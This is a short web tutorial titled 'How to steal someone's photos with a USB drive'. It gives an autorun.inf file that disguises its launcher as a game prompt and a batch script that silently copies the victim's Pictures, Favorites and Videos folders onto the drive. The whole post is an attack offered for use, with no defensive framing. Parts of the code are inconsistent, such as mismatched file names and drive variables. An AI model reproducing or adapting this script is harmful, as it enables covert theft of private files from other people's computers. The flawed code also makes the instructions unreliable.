How to steal someones photos with a USB drive

 How to steal someone's photos with a USB drive

  1. This will autorun the bat files when the USB is connected
  2. Copy the following codes to the notepad and save as "autorun.inf"

    [autorun] 

    icon=drive.ico 

    open=launch.bat 

    action=Click ok to Run game for Windows 

    shell\open\command=launch.bat 


  3. This will make a backup of the pictures on the C: Drive of the pc. 

Copy the following codes and save as "file.bat"

 

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
 

Comments